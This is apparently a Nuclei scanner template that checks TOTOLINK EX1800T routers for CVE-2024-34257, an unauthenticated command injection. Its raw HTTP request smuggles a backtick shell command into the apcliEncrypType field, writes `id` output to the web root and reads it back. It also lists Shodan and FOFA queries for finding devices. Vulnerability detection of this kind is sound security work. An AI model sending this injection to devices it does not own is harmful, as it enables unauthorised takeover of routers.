id: CVE-2024-34257

info:
  name: TOTOLINK EX1800T - Command Injection
  author: pussycat0x
  severity: high
  description: |
    TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a command injection vulnerability in the apcliEncrypType parameter of the setWiFiExtenderConfig request handled by /cgi-bin/cstecgi.cgi. The request needs no authentication, so an unauthenticated attacker can execute arbitrary commands and obtain device administrator privileges.
  impact: |
    Unauthenticated attackers can execute arbitrary commands via the apcliEncrypType parameter, gaining device administrator privileges.
  remediation: |
    Update TOTOLINK EX1800T firmware to a version that patches the command injection vulnerability.
  reference:
    - https://github.com/ZackSecurity/VulnerReport/blob/cve/totolink/EX1800T/1.md
    - https://immense-mirror-b42.notion.site/TOTOLINK-EX1800T-has-an-unauthorized-arbitrary-command-execution-vulnerability-2f3e308f5e1d45a2b8a64f198cacc350
    - https://github.com/20142995/nuclei-templates
  classification:
    epss-score: 0.88445
    epss-percentile: 0.99518
  metadata:
    vendor: totolink
    product: a3700r_firmware
    shodan-query: http.title:"totolink"
    fofa-query: title="totolink"
    google-query: intitle:"totolink"
  tags: cve,cve2024,rce,unauth,vkev,vuln

variables:
  # Random file stem so the proof file name is not predictable across runs
  file: "{{rand_base(6)}}"

http:
  - raw:
      # Step 1: the backticks are shell command substitution. The output of
      # `id` is redirected one directory above cgi-bin, i.e. into the web root.
      # Note: this check leaves {{file}}.txt on the device; remove it after testing.
      - |
        POST /cgi-bin/cstecgi.cgi HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Referer: {{RootURL}}/page/index.html

        {
          "token":"",
          "apcliEncrypType":"`id>../{{file}}.txt`",
          "topicurl":"setWiFiExtenderConfig"
        }

      # Step 2: fetch the file written by the injected command
      - |
        GET /{{file}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      # The first response must report that the config request was accepted
      - type: word
        part: body_1
        words:
          - '"success": true'

      # The second response must contain id(1) output, proving execution
      - type: regex
        part: body_2
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"

      - type: status
        status:
          - 200
# digest: 490a00463044022000b7591c75d55d7c72ac7ea034e8343673c214cfbf419f4d61a6c253354f93f802200b0fad8c884ee99a1b2f6aead4bdb9992d22fd35236dbe34aaba0d5e979c28d3:922c64590222798bb761d5b6d8e72950